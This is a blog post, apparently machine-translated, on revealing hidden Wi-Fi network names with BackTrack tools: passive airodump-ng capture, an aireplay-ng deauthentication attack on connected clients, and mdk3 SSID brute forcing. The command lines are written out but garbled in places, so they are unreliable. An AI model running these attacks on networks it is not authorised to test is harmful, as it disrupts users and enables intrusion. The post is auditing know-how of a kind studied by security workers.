Continuing with the next part of wireless insecurity, 3 methods show very simple but are of little use to discover which is the name of a hidden network, there are many networks, making safe hereunder. So we proved that this type of security is not so sure.
following example we used for the distribution of bt4, and 2 wireless devices for greater understanding of the example, but can be done with a single card. As a customer we have: PCI Card with Ralink 2561 wlan0 interface
To audit are: Realtek RTL8187B with USB interface wlan1
Method 1 The first method requires much time, can even take hours, is leaving our airodump-ng to listening, and hope that a true AP client, connect to it, when a client connects the airodump-ng capturing the package with the network name. Remove the module from the tarjerta
rmmod rtl8187 load the card module modprobe rtl8187
Put the card in monitor mode
airmon-ng start wlan1
Put the airodump-ng to listen
airodump-ng --bssid-c canal_AP mon0 mac_AP Method 2 The second method is to attack a user desautenficación connected.
rmmod rtl8187 modprobe rtl8187
airmon-ng start wlan1 airodump-ng --bssid-c canal_AP mon0 mac_AP
deauthentication Attack of an associated client. In this case deauthentication send 5 packets, in case you can not resist sending more. 
aireplay-ng -0 5-a-c mac_CLIENTE mon0 mac_AP 
The client was disconnected a little while AP and reconnects, so it will send the package with the name of the AP. Method 3
Here we use the mdk3 to perform a brute force attack (ESSID brute force), this attack is not connected client needs only the name is proved to have the file that contains the pass. In mdk3 detect the length of the network name and the words proved only detected length. The problem is when when the airodump-ng detect networks with network name length lenght lenght -1 or 0 (The AP does not broadcast the network name length). This attack is used when you know the length of the network name. The mdk3 not do anything. What we try to do was to modify the code mdk3 to have the default length specified by us, but we could not even compile the source code of mdk3, it may be the version of the kernel. To avoid such problems with the backtrack and it includes among its wireless auditing tools.
mdk3 interface mac_AP p-t-s-f directorio_diccionario.txt paquetesXsegundo
Also the mdk3
have other forms of brute force search of the network name. The mdk3 already have your own dictionaries for this. mdk3 p-c interface channel mac_AP-b-t-s tipo_caracteres paquetesXsegundo
l: network names with lowercase letters u: network names in capital letters n: names with only numbers
c: case-sensitive combination m: combination of uppercase and lowercase letters and numbers
to: mix letters, numbers and special characters. Here Show me a little demonstration of method 1 and 3, unfortunately my wicd does not associate for the world to my only AP (TP-LINK TL-WA500G), but apparently not needed because the method is very simple.
0 comments:
Post a Comment